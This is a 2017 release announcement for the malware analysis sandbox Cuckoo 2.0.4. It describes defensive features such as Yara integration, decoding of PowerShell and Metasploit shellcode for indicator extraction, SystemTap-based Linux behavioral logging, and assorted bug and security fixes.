Automated Malware Analysis

Cuckoo Sandbox 2.0.4

  • September 06, 2017
  • Jurriaan Bremer

Since our 2.0.0 release in March earlier this year we've been busy shaping the new Cuckoo Package style of releases and further improving a number of features in Cuckoo. Since 2.0.0 we've somewhat quietly released a couple of minor versions to fix dozens of bugs.


With the release of 2.0.4 we yet again release a number of important improvements that will simplify and improve the user experience altogether while allowing additional functionality to feature more collected information.

Following a number of smaller and bigger changes that come with this new release:

  • Malware Configuration Extraction, part 1
  • Linux Analysis improvements
  • Miscellaneous improvements
  • Upcoming features
  • Conclusions

Malware Configuration Extraction, part 1

Now that Cuckoo has become the goto solution for generic behavior analysis, the time has come to also focus on more specific payloads and variants. We've included a number of new features in this release to facilitate such functionality.

(BTW, this is part 1 because future blogposts will continue upon it)

Yara integration

Cuckoo now ships with Yara by default after working together with Victor Manuel Alvarez. As such Yara is not an optional feature anymore. In the process of integrating we also identified CVE-2017-11328, a heap overflow in the Yara core that may be triggered through two different code paths in the .NET module.

Extracted category

We're introducing a new Extracted category, a category that allows recursive extraction of potentially interesting information. E.g., Cuckoo reports the command-line for each executed process. Many times, e.g., in almost every sample from Unit42's PowerShell blogpost, PowerShell will be invoked with the -EncodedCommand or -enc parameter, which accepts a base64-encoded utf16 string that represents the PowerShell payload.

In such cases we'll naturally want to see the actually executed PowerShell script rather than the base64. Cuckoo will now extract and analyze the decoded PowerShell script as if it was a dropped file (now called an extracted file).

Extractor Signatures

Extractor Signatures operate on Extracted artefacts after they have been identified by a specialized Yara rule. Such Extractor's can then generate other extracted files.

PowerShell Yara rules & Extractors

We've added a number of new Yara rules in the Cuckoo Community that can identify specific PowerShell payloads and, together with Extractor Signatures, extract x86 shellcode from the PowerShell payloads.

Unicorn Engine integration

After extracting a number of x86 shellcode payloads we came to the conclusion that they're mostly Metasploit payloads (as far as we saw in the sample set from the Unit42 blogpost anyway).

Some of these payloads were Shikata ga nai-encoded so we also did basic integration of Unicorn Engine, a lightweight CPU emulator framework, in order to decode the encoded shellcode payloads. There's still a bug in Unicorn Engine though that prevents certain Shikata ga nai payloads to be properly decoded - feel free to help us out on that matter!

Shellcode Disassembly Framework

While looking for a comprehensive but accurate shellcode disassembly framework we didn't find much, so we wrote our own, and that's how egghatch was born. Currently it's only in use for shellcode disassembly representation, but in the future we suspect the Unicorn Engine-based decoded functionality may move to egghatch and include a wider array of decoding options etc.

Metasploit IoC Extraction

Now having access to the plaintext shellcode it is possible to extract certain IOCs - in particular we'll be interested in seeing where the payload connects, being it an IP/port combination, a hostname, or a URL. We've added a basic Yara rule that can identify a couple of Metasploit payloads and Metasploit Shellcode Signature to extract the IOCs nicely into the final Cuckoo report.

Following a screenshot of a meterpreter/reverse_tcp payload that was found inside a Powerfun Injector payload.


Linux Analysis improvements

This release brings many improvements to the Linux Analysis component. Some new features were merged from pull requests made by the community (thanks to doomedraven and Bondey!) and some deprecated code was removed from the codebase (e.g., the missing probelkm kernel module).

For behavioral logging, SystemTap is now the primary method of analysis. SystemTap provides a convenient way to compile scripts to kernel modules which can potentially be harder to detect for malware running within the sandbox than any userland-based analysis components. SystemTap utilizes the Linux Kprobes interface to hook and log system calls when they occur on behalf of the analyzed sample.

Following is an example of the behavioral output as displayed by Cuckoo:


Fully logging the environment variables in execve(2) (as compared to the earlier strace-like [/* X vars */]) is one of the various SystemTap patches that we've provided to upstream already. Some other patches and ideas that we've run into are still pending to be released or pending to be implemented (either by upstream or by us).

The pid following logic that was previously located in the probelkm kernel module has now been implemented in our SystemTap script. Process creation and command-line information is now handled by the SystemTap log parser (one of our Processing modules) and is displayed by Cuckoo as follows:


Furthermore, the Linux Analyzer has been updated to be compatible with the new Cuckoo Agent version that was already in use on the windows platform. All Linux Analysis components now work out-of-the-box as detailed in the updated Linux Guest Linux Guest installation documentation page.

Some of the other improvements to the linux analysis component include:

  • Snapshot loading and KVM support has been added to the QEMU machinery for a significant performance boost.
  • The SystemTap regular expression parser has been replaced by a partitioning parser with unit tests for correct parsing behavior.
  • The SystemTap parser correctly parses and displays struct and array arguments and error constants.
  • The behavioral analysis log skips any system calls made by the analyzer process itself.
  • A bug in the QEMU machinery code that could cause a guest image to be nuked without warning has been fixed.
  • sflock now supports and recognizes ELF executables and .sh scripts.
  • ELF parsing has been added to the static analysis component (thanks to doomedraven).

With these new improvements we hope to bring new life to the Linux Analysis component of Cuckoo Sandbox and bring it up to speed with its Windows counterpart. Stay tuned!

Miscellaneous tweaks

Other improvements brought to our users in this release:

  • InetSim support works once again as the Cuckoo Rooter has been patched and tested (thanks doomedraven).
  • Various Unicode-related issues have been resolved and as such Cuckoo should now handle different Unicode filepaths better (both on the Host as well as on the Guest).
  • The random files that are generated for each analysis run are now put in the My Documents directory rather than Desktop by default, therefore no longer confusing our users (and hopefully this change will not re-confuse you!) Screenshots made by Cuckoo are now not randomized for each analysis.
  • A potential XSS when submitting a "specially crafted" URL in the Cuckoo Web Interface has been resolved. Thanks to Roy Kokkelkoren, Niels van Eijck, and Wouter Katz for reporting it.

Upcoming features

It's been a while and our community has been asking for it for a few years now, but we've finally picked up on official zer0m0n (originally developed by CONIX Security) integration within Cuckoo Sandbox. Please stay tuned for the version 2.0.5 release ;-)


This release took longer than expected, but hopefully our users love it as much as we do. Thanks to our great team for putting all of it together.

As you can see we've also updated our website! All your needs should be one click away now.

  • September 06, 2017
  • Jurriaan Bremer

Cuckoo Sandbox 2.0 -